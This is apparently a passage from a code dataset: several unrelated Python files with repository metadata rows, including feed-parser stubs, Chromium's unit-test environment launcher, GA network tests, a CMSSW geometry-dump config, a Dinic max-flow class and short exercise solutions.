        return buildReleaseMessage(item, 'Invincible Level Up', vol, chp, frag=frag, postfix=postfix)
    return False
def extractShouldntbehereblog(item):
    """Parser for 'Shouldnt be here blog' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractShovaTranslations(item):
    """Parser for 'Shova Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractSilkpantsEntente(item):
    """Parser for 'Silkpants Entente' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractSnowTimeTranslations(item):
    """Parser for 'SnowTime Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractSteadyTranslation(item):
    """Parser for 'Steady Translation' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'In Different World With Naruto System' in item['tags']:
        return buildReleaseMessage(item, 'In Different World With Naruto System', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    return False
def extractSunnyTranslations(item):
    """Parser for 'SunnyTranslations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractTandQ(item):
    """Parser for 'T&Q' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    for tag, series in (('#Les Interpretes', 'Les Interpretes'),
                        ('致我们终将逝去的青春', 'To Our Youth That is Fading Away')):
        if tag in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def extractTequilaMockingbard(item):
    """Parser for 'Tequila Mockingbard' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractTheBoyWhoCouldntBeAHero(item):
    """Parser for 'The Boy Who Couldn't Be A Hero' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractThePaperFictions(item):
    """Parser for 'thepaperfictions.wordpress.com' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractTokyoESPScans(item):
    """Parser for 'Tokyo ESP Scans' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractUniqueBooks(item):
    """Parser for 'Unique Books' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
| [
"[email protected]"
]
| |
2ab6abbd0e1431436acb7dda3b3ede40938d460d | 38c10c01007624cd2056884f25e0d6ab85442194 | /testing/test_env.py | 052df6769b262c442a5b8721ae38c166c659c0b8 | [
"BSD-3-Clause"
]
| permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 8,248 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Sets environment variables needed to run a chromium unit test."""
import os
import stat
import subprocess
import sys
# This is hardcoded to be src/ relative to this script.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'
CHROME_SANDBOX_PATH = '/opt/chromium/chrome_sandbox'
def get_sandbox_env(env):
  """Returns the environment flags needed for the SUID sandbox to work."""
  # An empty CHROME_DEVEL_SANDBOX value must not silently disable the SUID
  # sandbox (http://crbug.com/245376), so any falsy setting falls back to the
  # default path.
  # TODO(jln): Remove this fallback once it's no longer possible to disable
  # the sandbox that way.
  configured = env.get(CHROME_SANDBOX_ENV)
  return {CHROME_SANDBOX_ENV: configured or CHROME_SANDBOX_PATH}
def trim_cmd(cmd):
  """Removes internal flags from cmd since they're just used to communicate from
  the host machine to this script running on the swarm slaves."""
  internal_flags = frozenset(
      '--%s=%d' % (name, value)
      for name in ('asan', 'lsan', 'msan', 'tsan')
      for value in (0, 1))
  return [arg for arg in cmd if arg not in internal_flags]
def fix_python_path(cmd):
  """Returns the fixed command line to call the right python executable."""
  fixed = cmd[:]
  if fixed[0] == 'python':
    # A literal "python" is replaced by the interpreter running this script.
    fixed[0] = sys.executable
  elif fixed[0].endswith('.py'):
    # A bare script path gets the interpreter prepended.
    fixed.insert(0, sys.executable)
  return fixed
def get_sanitizer_env(cmd, asan, lsan, msan, tsan):
  """Returns the environment variables needed for sanitizer tools.

  Args:
    cmd: the test command line; cmd[0] is used on OS X to locate the isolate
      output directory for DYLD_LIBRARY_PATH.
    asan, lsan, msan, tsan: booleans selecting which sanitizers are active.

  Returns:
    A dict of extra environment variables to merge into the test environment.
  """
  extra_env = {}
  # Instruct GTK to use malloc while running sanitizer-instrumented tests.
  extra_env['G_SLICE'] = 'always-malloc'
  extra_env['NSS_DISABLE_ARENA_FREE_LIST'] = '1'
  extra_env['NSS_DISABLE_UNLOAD'] = '1'
  # TODO(glider): remove the symbolizer path once
  # https://code.google.com/p/address-sanitizer/issues/detail?id=134 is fixed.
  symbolizer_path = os.path.abspath(os.path.join(ROOT_DIR, 'third_party',
      'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer'))
  if lsan or tsan:
    # LSan is not sandbox-compatible, so we can use online symbolization. In
    # fact, it needs symbolization to be able to apply suppressions.
    symbolization_options = ['symbolize=1',
                             'external_symbolizer_path=%s' % symbolizer_path]
  elif (asan or msan) and sys.platform not in ['win32', 'cygwin']:
    # ASan uses a script for offline symbolization, except on Windows.
    # Important note: when running ASan with leak detection enabled, we must use
    # the LSan symbolization options above.
    symbolization_options = ['symbolize=0']
    # Set the path to llvm-symbolizer to be used by asan_symbolize.py
    extra_env['LLVM_SYMBOLIZER_PATH'] = symbolizer_path
  else:
    symbolization_options = []
  if asan:
    asan_options = symbolization_options[:]
    if lsan:
      # ASan can run LSan's leak detection in the same process.
      asan_options.append('detect_leaks=1')
    if asan_options:
      extra_env['ASAN_OPTIONS'] = ' '.join(asan_options)
    if sys.platform == 'darwin':
      isolate_output_dir = os.path.abspath(os.path.dirname(cmd[0]))
      # This is needed because the test binary has @executable_path embedded in
      # it that the OS tries to resolve to the cache directory and not the
      # mapped directory.
      extra_env['DYLD_LIBRARY_PATH'] = str(isolate_output_dir)
  if lsan:
    if asan or msan:
      # Leak detection is driven by the ASan/MSan runtime; LSAN_OPTIONS stays
      # empty so the symbolization settings above are not duplicated.
      lsan_options = []
    else:
      lsan_options = symbolization_options[:]
    if sys.platform == 'linux2':
      # Use the debug version of libstdc++ under LSan. If we don't, there will
      # be a lot of incomplete stack traces in the reports.
      extra_env['LD_LIBRARY_PATH'] = '/usr/lib/x86_64-linux-gnu/debug:'
    extra_env['LSAN_OPTIONS'] = ' '.join(lsan_options)
  if msan:
    msan_options = symbolization_options[:]
    if lsan:
      msan_options.append('detect_leaks=1')
    extra_env['MSAN_OPTIONS'] = ' '.join(msan_options)
  if tsan:
    tsan_options = symbolization_options[:]
    extra_env['TSAN_OPTIONS'] = ' '.join(tsan_options)
  return extra_env
def get_sanitizer_symbolize_command(json_path=None, executable_path=None):
  """Construct the command to invoke offline symbolization script."""
  cmd = [sys.executable, '../tools/valgrind/asan/asan_symbolize.py']
  if json_path is not None:
    cmd.append('--test-summary-json-file=%s' % json_path)
  if executable_path is not None:
    cmd.append('--executable-path=%s' % executable_path)
  return cmd
def get_json_path(cmd):
  """Extract the JSON test summary path from a command line.

  Returns None when no --test-launcher-summary-output flag is present.
  """
  flag = '--test-launcher-summary-output='
  for arg in cmd:
    if arg.startswith(flag):
      return arg.split(flag)[-1]
  return None
def symbolize_snippets_in_json(cmd, env):
  """Symbolize output snippets inside the JSON test summary.

  No-op when the command line carries no JSON summary path.  A failure to
  start the symbolizer is reported and swallowed; a non-zero exit of the
  symbolizer is reported on stdout.
  """
  json_path = get_json_path(cmd)
  if json_path is None:
    return
  try:
    symbolize_command = get_sanitizer_symbolize_command(
        json_path=json_path, executable_path=cmd[0])
    p = subprocess.Popen(symbolize_command, stderr=subprocess.PIPE, env=env)
    (_, stderr) = p.communicate()
  except OSError as e:
    # Bail out here: if Popen raised, `p` was never bound and the returncode
    # check below would itself crash with a NameError.
    print('Exception while symbolizing snippets: %s' % e)
    return
  if p.returncode != 0:
    print("Error: failed to symbolize snippets in JSON:\n")
    print(stderr)
def run_executable(cmd, env):
  """Runs an executable with:
    - environment variable CR_SOURCE_ROOT set to the root directory.
    - environment variable LANGUAGE to en_US.UTF-8.
    - environment variable CHROME_DEVEL_SANDBOX set
    - Reuses sys.executable automatically.

  Note: mutates both `cmd` (may append --no-sandbox) and `env` in place,
  and returns the exit code of the launched process.
  """
  extra_env = {}
  # Many tests assume a English interface...
  extra_env['LANG'] = 'en_US.UTF-8'
  # Used by base/base_paths_linux.cc as an override. Just make sure the default
  # logic is used.
  env.pop('CR_SOURCE_ROOT', None)
  extra_env.update(get_sandbox_env(env))
  # Copy logic from tools/build/scripts/slave/runtest.py.
  # Sanitizer selection is passed in-band as internal flags on the command
  # line (stripped again by trim_cmd below).
  asan = '--asan=1' in cmd
  lsan = '--lsan=1' in cmd
  msan = '--msan=1' in cmd
  tsan = '--tsan=1' in cmd
  if sys.platform in ['win32', 'cygwin']:
    # Symbolization works in-process on Windows even when sandboxed.
    use_symbolization_script = False
  else:
    # LSan doesn't support sandboxing yet, so we use the in-process symbolizer.
    # Note that ASan and MSan can work together with LSan.
    use_symbolization_script = (asan or msan) and not lsan
  if asan or lsan or msan or tsan:
    extra_env.update(get_sanitizer_env(cmd, asan, lsan, msan, tsan))
    if lsan or tsan:
      # LSan and TSan are not sandbox-friendly.
      cmd.append('--no-sandbox')
  cmd = trim_cmd(cmd)
  # Ensure paths are correctly separated on windows.
  cmd[0] = cmd[0].replace('/', os.path.sep)
  cmd = fix_python_path(cmd)
  print('Additional test environment:\n%s\n'
      'Command: %s\n' % (
      '\n'.join(' %s=%s' %
      (k, v) for k, v in sorted(extra_env.iteritems())),
      ' '.join(cmd)))
  env.update(extra_env or {})
  try:
    # See above comment regarding offline symbolization.
    if use_symbolization_script:
      # Need to pipe to the symbolizer script.
      p1 = subprocess.Popen(cmd, env=env, stdout=subprocess.PIPE,
          stderr=sys.stdout)
      p2 = subprocess.Popen(
          get_sanitizer_symbolize_command(executable_path=cmd[0]),
          env=env, stdin=p1.stdout)
      p1.stdout.close()  # Allow p1 to receive a SIGPIPE if p2 exits.
      p1.wait()
      p2.wait()
      # Also feed the out-of-band JSON output to the symbolizer script.
      symbolize_snippets_in_json(cmd, env)
      return p1.returncode
    else:
      return subprocess.call(cmd, env=env)
  except OSError:
    print >> sys.stderr, 'Failed to start %s' % cmd
    raise
def main():
  """Run the wrapped test command with the adjusted environment."""
  cmd = sys.argv[1:]
  env = os.environ.copy()
  return run_executable(cmd, env)


if __name__ == '__main__':
  sys.exit(main())
| [
"[email protected]"
]
| |
f2cd0ab77cb5f8fa5558cf6172353ec2230c9127 | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /CodeUp/Python 기초 100제/6036번 ; 단어 여러 번 출력하기.py | bc0bcc44a3400612fd542a6d58530b3105f25276 | []
| no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # https://codeup.kr/problem.php?id=6036
# readline을 사용하기 위해 import합니다.
from sys import stdin
# 단어와 반복 횟수를 공백으로 구분해 입력합니다.
word, repeat_cnt = stdin.readline().split(' ')
# 반복 횟수는 정수형으로 변환합니다.
repeat_cnt = int(repeat_cnt)
# 입력한 단어를 입력한 횟수만큼 반복해 출력합니다.
print(word * repeat_cnt) | [
"[email protected]"
]
| |
c6e462a6e0fd6dad1a07c73b7443f6fd2dfd4419 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s591389519.py | 8762798d4042e04b87616ffd6fa0f37468561ff7 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
s = input()
distinct = set(s)

# "Yes" exactly when the string holds two distinct characters and neither
# of them occurs more than twice; "No" otherwise.
ok = len(distinct) == 2 and all(s.count(ch) <= 2 for ch in distinct)
print('Yes' if ok else 'No')
| [
"[email protected]"
]
| |
5f7afd4b4b67a971d1a07293744294fe27cd11a4 | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/GA_NN/v4/testGA.py | c6a234d32f017184ac400c1068bb0f05643dd4d1 | []
| no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,124 | py | import unittest
from GA import createPop, pairPop, NN, rankPop, itemgetter
from GA import evolveNewPop, selectTwoIndividuals
from pylab import where, array
class testcreatePop(unittest.TestCase):
    def setUp(self):
        self.pop = createPop()

    def testType(self):
        """Every individual produced by createPop is a NN instance."""
        for individual in self.pop:
            self.assertIsInstance(individual, NN)

    def testWeightsAreNotTheSame(self):
        """No two individuals share a fully identical weight row.

        Every ordered pair of distinct individuals is compared, for both
        the input and the output weight matrices.
        """
        size = len(self.pop)
        for a in range(size):
            for b in range(size):
                if a == b:
                    continue
                in_equal = array(self.pop[a].wi) == array(self.pop[b].wi)
                for row in in_equal:
                    self.assertFalse(row.all())
                out_equal = array(self.pop[a].wo) == array(self.pop[b].wo)
                for row in out_equal:
                    self.assertFalse(row.all())

    def testShapeOfInputWeights(self):
        """Input weight matrices have shape (NN.ni, NN.nh)."""
        for individual in self.pop:
            self.assertEqual(array(individual.wi).shape, (NN.ni, NN.nh))

    def testShapeOfOutputWeights(self):
        """Output weight matrices have shape (NN.nh, NN.no)."""
        for individual in self.pop:
            self.assertEqual(array(individual.wo).shape, (NN.nh, NN.no))
class testpairPop(unittest.TestCase):
    """
    paired pop is zip(weights, errors, fitnesses)
    accessed in the order:
    pairedPop[individual][weights][input/output weights]
    """
    def setUp(self):
        self.pop = createPop()
        self.pairedPop = pairPop(self.pop)
    # Each paired entry has 4 fields, one row per individual.
    def testShapeOfPairedPop(self):
        self.assertEqual(array(self.pairedPop).shape,
                         (NN.pop_size, 4))
    # pairPop must deep-copy the weights: compare object identities of the
    # originals against the paired entries.
    def testWeightsAreACopy(self):
        for i in range(len(self.pop)):
            self.assertNotEqual(id(self.pop[i].wi),
                                id(self.pairedPop[i][0][0]),
                                'input weights, ind ' + str(i) )
            self.assertNotEqual(id(self.pop[i].wo),
                                id(self.pairedPop[i][0][1]),
                                'output weights, ind ' + str(i))
    # Pairing must preserve the (NN.ni, NN.nh) input weight shape.
    def testShapeOfInputWeights(self):
        for ind in self.pairedPop:
            self.assertEqual(array(ind[0][0]).shape,
                             (NN.ni, NN.nh))
    # Pairing must preserve the (NN.nh, NN.no) output weight shape.
    def testShapeOfOutputWeights(self):
        for ind in self.pairedPop:
            self.assertEqual(array(ind[0][1]).shape,
                             (NN.nh, NN.no))
class testrankPop(unittest.TestCase):
    # Placeholder test case: rankPop is imported but not yet exercised.
    def setUp(self):
        # need to test that rankedPop is ordered in descending order
        pass
class testevolveNewPop(unittest.TestCase):
    """
    rankedPop is zip(weights, errors, fitnesses) ordered in descending
    order of fitness
    """
    def setUp(self):
        # Build a population, pair it with its scores, rank by fitness
        # (last tuple element, descending) and evolve one new generation.
        self.pop = createPop()
        self.pairedPop = pairPop(self.pop)
        self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
        self.rankedWeights = [x[0] for x in self.rankedPop]
        self.fitnessScores = [x[-1] for x in self.rankedPop]
        self.newpopW = evolveNewPop(self.rankedPop)
    # Input weight matrices keep the (NN.ni, NN.nh) shape.
    def testShapeOfInputWeights(self):
        for ind in self.pairedPop:
            self.assertEqual(array(ind[0][0]).shape,
                             (NN.ni, NN.nh))
    # Output weight matrices keep the (NN.nh, NN.no) shape.
    def testShapeOfOutputWeights(self):
        for ind in self.pairedPop:
            self.assertEqual(array(ind[0][1]).shape,
                             (NN.nh, NN.no))
    # The evolved population must hold new objects, not references into
    # the ranked parent weights (checked via object identity).
    def testNotCopiesOfRankedPop(self):
        for i in range(len(self.newpopW)):
            for j in range(len(self.rankedWeights)):
                self.assertNotEqual(id(self.newpopW[i]),
                                    id(self.rankedWeights[j]),
                                    'individual %d\'s weights are a view of ranked' % i +
                                    'weights %d' % j)
                for io in range(len(self.newpopW[i])):
                    self.assertNotEqual(id(self.newpopW[i][io]),
                                        id(self.rankedWeights[j][io]),
                                        'individual %d\'s %d weights are a view '
                                        % (i, io) + 'of ranked weights %d' % j)
    # The top NN.eliteN individuals are carried over unchanged, so the
    # element-wise difference with the parents must be all zeros.
    def testElitism(self):
        for i in range(NN.eliteN):
            for io in range(2):
                shouldBeZeros = self.rankedWeights[i][io] - self.newpopW[i][io]
                self.assertFalse(shouldBeZeros.any())
    # Population size is constant across generations.
    def testLengthOfNewPop(self):
        self.assertEqual(len(self.newpopW), NN.pop_size)
    # The whole nested weight structure keeps its shape after evolution.
    def testShapeOfNewPop(self):
        oldshape = array(self.rankedWeights).shape
        newshape = array(self.newpopW).shape
        self.assertEqual(oldshape, newshape)
        for i in range(len(self.pop)):
            for io in range(len(self.rankedWeights[i])):
                assert io <= 1
                self.assertEqual(
                    array(self.rankedWeights[i][io]).shape,
                    array(self.newpopW[i][io]).shape)
class testselectTwoIndividuals(unittest.TestCase):
    def setUp(self):
        # Rank a fresh population by fitness, then select two parent
        # chromosomes from the ranked weights.
        self.pop = createPop()
        self.pairedPop = pairPop(self.pop)
        self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
        self.rankedWeights = [x[0] for x in self.rankedPop]
        self.fitnessScores = [x[-1] for x in self.rankedPop]
        self.ch1, self.ch2 = selectTwoIndividuals(self.fitnessScores, self.rankedWeights)
    # Both selected chromosomes (and their input/output weight halves)
    # must be new objects, not references into rankedWeights.
    def testChromosomesAreNotShallowCopies(self):
        for i in range(len(self.rankedWeights)):
            self.assertNotEqual(
                id(self.ch1),
                id(self.rankedWeights[i]))
            self.assertNotEqual(
                id(self.ch2),
                id(self.rankedWeights[i]))
            for io in range(len(self.rankedWeights[i])):
                assert io <= 1
                self.assertNotEqual(
                    id(self.ch1[io]),
                    id(self.rankedWeights[i][io]))
                self.assertNotEqual(
                    id(self.ch2[io]),
                    id(self.rankedWeights[i][io]))
if __name__ == '__main__':
unittest.main() | [
"[email protected]"
]
| |
06cb9f6621d634240e8d8059be5f33b447dbb0d2 | 7887a24a4c0eed525a044b785e950d9a71ea7558 | /SimG4Core/PrintGeomInfo/test/python/runDDD2026_cfg.py | ab8ed29b51b7e934ab9a57aa86d12a95a6ee501a | [
"Apache-2.0"
]
| permissive | CMS-HGCAL/cmssw | 1aba653346d5a6a69aa60629b7b0cf81880cef91 | 03230166537ea0ea9e0c975cf28964ee81d545ae | refs/heads/hgcal-condformat-HGCalNANO-13_2_0_pre2 | 2023-08-16T21:25:36.872190 | 2023-08-14T20:05:05 | 2023-08-15T23:28:48 | 62,036,013 | 2 | 2 | Apache-2.0 | 2023-09-12T13:02:50 | 2016-06-27T07:48:31 | C++ | UTF-8 | Python | false | false | 3,674 | py | ###############################################################################
# Way to use this:
# cmsRun runDDD2026_cfg.py geometry=D88
#
# Options for geometry D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99
#
###############################################################################
import FWCore.ParameterSet.Config as cms
import os, sys, imp, re
import FWCore.ParameterSet.VarParsing as VarParsing
####################################################################
### SETUP OPTIONS
options = VarParsing.VarParsing('standard')
options.register('geometry',
                 "D92",
                 VarParsing.VarParsing.multiplicity.singleton,
                 VarParsing.VarParsing.varType.string,
                 "geometry of operations: D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99")

### get and parse the command line arguments
options.parseArguments()
print(options)

####################################################################
# Use the options

# D94 is the only geometry configured with the Phase2C20I13M9 era; all
# other supported geometries use Phase2C17I13M9.
if options.geometry == "D94":
    from Configuration.Eras.Era_Phase2C20I13M9_cff import Phase2C20I13M9
    process = cms.Process('G4PrintGeometry', Phase2C20I13M9)
else:
    from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
    process = cms.Process('G4PrintGeometry', Phase2C17I13M9)

# Geometry configuration module and the per-geometry output text files.
geomFile = "Configuration.Geometry.GeometryExtended2026{0}Reco_cff".format(options.geometry)
materialFileName = "matfile{0}DDD.txt".format(options.geometry)
solidFileName = "solidfile{0}DDD.txt".format(options.geometry)
lvFileName = "lvfile{0}DDD.txt".format(options.geometry)
pvFileName = "pvfile{0}DDD.txt".format(options.geometry)
touchFileName = "touchfile{0}DDD.txt".format(options.geometry)
regionFileName = "regionfile{0}DDD.txt".format(options.geometry)

print("Geometry file Name: ", geomFile)
print("Material file Name: ", materialFileName)
print("Solid file Name: ", solidFileName)
print("LV file Name: ", lvFileName)
print("PV file Name: ", pvFileName)
print("Touch file Name: ", touchFileName)
print("Region file Name: ", regionFileName)

process.load(geomFile)
process.load('FWCore.MessageService.MessageLogger_cfi')

from SimG4Core.PrintGeomInfo.g4PrintGeomInfo_cfi import *

process = printGeomInfo(process)

# Silence the raw Geant4 output streams when a MessageLogger is present.
if hasattr(process, 'MessageLogger'):
    process.MessageLogger.G4cerr = dict()
    process.MessageLogger.G4cout = dict()

# Dump only the summary and the solids; file names point at the
# per-geometry text files built above.
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
    DumpSummary      = cms.untracked.bool(True),
    DumpLVTree       = cms.untracked.bool(False),
    DumpMaterial     = cms.untracked.bool(False),
    DumpLVList       = cms.untracked.bool(False),
    DumpLV           = cms.untracked.bool(False),
    DumpSolid        = cms.untracked.bool(True),
    DumpAttributes   = cms.untracked.bool(False),
    DumpPV           = cms.untracked.bool(False),
    DumpRotation     = cms.untracked.bool(False),
    DumpReplica      = cms.untracked.bool(False),
    DumpTouch        = cms.untracked.bool(False),
    DumpSense        = cms.untracked.bool(False),
    DumpRegion       = cms.untracked.bool(False),
    DD4hep           = cms.untracked.bool(False),
    Name             = cms.untracked.string(''),
    Names            = cms.untracked.vstring(''),
    MaterialFileName = cms.untracked.string(materialFileName),
    SolidFileName    = cms.untracked.string(solidFileName),
    LVFileName       = cms.untracked.string(lvFileName),
    PVFileName       = cms.untracked.string(pvFileName),
    TouchFileName    = cms.untracked.string(touchFileName),
    RegionFileName   = cms.untracked.string(regionFileName),
    FileDetail       = cms.untracked.bool(True),
    type             = cms.string('PrintGeomInfoAction')
))
| [
"[email protected]"
]
| |
694642cedfed44db0b0286b0ec4dbb6e4b50e77a | 29b58edf26d0e4a965ea758c1f0e6ae51a61d3ed | /Loops/1loops.py | dfc631f39038bed104ec937e38d0060f11e1f85e | []
| no_license | namntran/modern_python3_bootcamp | bfe0fc8b647329f44ad4228d7a12480b9f3821cd | 6b273112b4bd324b95d0dc148c46f605c792c167 | refs/heads/master | 2020-06-16T20:27:41.891467 | 2020-02-16T04:53:16 | 2020-02-16T04:53:16 | 195,694,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # i = 1
# while i < 5:
# i += i #increment i by 1
# print(i)
# print 1 to 5
# i = 0
# while i <= 5:
# i += 1
# print(i)
# from random import randint # use randint(a, b) to generate a random number between a and b
from random import randint

# Draw random integers in [1, 10], printing each draw, until a 5 comes up.
# `attempts` counts how many draws were needed.
attempts = 0
number = 0
while number != 5:
    attempts += 1
    number = randint(1, 10)
    print(number)
"[email protected]"
]
| |
2ce0d6b47e327d9dac0dc05d12e07d920f9cbc62 | 94df1d5cd401bd035e36cb96d2ceacd09b223ac0 | /python_library/graph/dinic.py | 256fdc946c39601eaced238f0e62a3606df045f8 | [
"MIT"
]
| permissive | knuu/contest_library | 3b7dce152041009c37caf11a483f9e79e74052ad | 0d3bff34df965d00e1e4a0f2e4fbe8e822810fd5 | refs/heads/master | 2022-11-09T20:44:33.430736 | 2022-11-05T16:22:21 | 2022-11-05T16:22:21 | 180,644,772 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import collections
class MaxFlow:
    """Maximum flow via Dinic's algorithm.

    Complexity: O(E * V^2).
    Verified on GRL_6_A (AOJ).
    """

    class Edge:
        """Directed edge of the residual network.

        to:  head vertex
        cap: remaining capacity
        rev: index of the paired reverse edge inside E[to]
        """
        def __init__(self, to, cap, rev):
            self.to, self.cap, self.rev = to, cap, rev

    def __init__(self, V):
        """V: number of vertexes; E: adjacency list of Edge objects."""
        self.V = V
        self.E = [[] for _ in range(V)]

    def add_edge(self, fr, to, cap):
        """Add a directed edge fr -> to with capacity cap.

        A zero-capacity reverse edge is added as well so flow can be
        pushed back along the residual network.
        """
        self.E[fr].append(self.Edge(to, cap, len(self.E[to])))
        self.E[to].append(self.Edge(fr, 0, len(self.E[fr]) - 1))

    def run(self, source, sink, INF=10 ** 9):
        """Return the maximum flow from source to sink."""
        maxflow = 0
        while True:
            self.bfs(source)
            if self.level[sink] < 0:
                # Sink no longer reachable in the residual graph: done.
                return maxflow
            # Current-arc pointers, reset once per BFS phase.
            self.itr = [0] * self.V
            while True:
                flow = self.dfs(source, sink, INF)
                if flow > 0:
                    maxflow += flow
                else:
                    break

    def dfs(self, vertex, sink, flow):
        """Push one augmenting path along increasing BFS levels.

        Returns the amount of flow pushed, or 0 if no path exists from
        `vertex` in the current phase.
        """
        if vertex == sink:
            return flow
        for i in range(self.itr[vertex], len(self.E[vertex])):
            self.itr[vertex] = i
            e = self.E[vertex][i]
            if e.cap > 0 and self.level[vertex] < self.level[e.to]:
                d = self.dfs(e.to, sink, min(flow, e.cap))
                if d > 0:
                    e.cap -= d
                    self.E[e.to][e.rev].cap += d
                    return d
        # Fix: advance the current-arc pointer past the last edge so a
        # dead vertex is never rescanned within the same phase.  The
        # original left itr[vertex] at the final index, re-entering the
        # failed subtree on every revisit and voiding the pointer
        # optimization Dinic's complexity bound relies on.
        self.itr[vertex] = len(self.E[vertex])
        return 0

    def bfs(self, start):
        """Compute BFS levels (shortest residual distance) from start.

        Unreachable vertexes keep level -1.
        """
        que = collections.deque()
        self.level = [-1] * self.V
        que.append(start)
        self.level[start] = 0
        while que:
            fr = que.popleft()
            for e in self.E[fr]:
                if e.cap > 0 and self.level[e.to] < 0:
                    self.level[e.to] = self.level[fr] + 1
                    que.append(e.to)
| [
"[email protected]"
]
| |
b5f06531dbe3c04664346f6cfd8fbd90c85fa5b5 | 9adc810b07f7172a7d0341f0b38088b4f5829cf4 | /tests/test_continuous_memory_augmented.py | 5eb4373d630b344ea3e657bd6e5768e045be776a | [
"MIT"
]
| permissive | Asap7772/railrl_evalsawyer | 7ee9358b5277b9ddf2468f0c6d28beb92a5a0879 | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | refs/heads/main | 2023-05-29T10:00:50.126508 | 2021-06-18T03:08:12 | 2021-06-18T03:08:12 | 375,810,557 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | import unittest
import numpy as np
from rlkit.envs.memory.continuous_memory_augmented import (
ContinuousMemoryAugmented,
)
from rlkit.envs.memory.one_char_memory import OneCharMemory
from rlkit.testing.np_test_case import NPTestCase
class TestContinuousMemoryAugmented(NPTestCase):
    def _make_env(self):
        """Wrap a small OneCharMemory env with 10 continuous memory states."""
        base_env = OneCharMemory(n=5, num_steps=100)
        return ContinuousMemoryAugmented(base_env, num_memory_states=10)

    def test_dim_correct(self):
        # 16 = 6 env-action dims + 10 memory states.
        env = self._make_env()
        self.assertEqual(env.action_space.flat_dim, 16)

    def test_memory_action_saved(self):
        # Whatever the memory half of the action writes must come back
        # unchanged in the observation returned by step().
        env = self._make_env()
        env.reset()
        base_action = np.zeros(6)
        base_action[0] = 1
        written = np.random.rand(10)
        _, remembered = env.step([base_action, written])[0]
        self.assertNpArraysEqual(written, remembered)


if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
]
| |
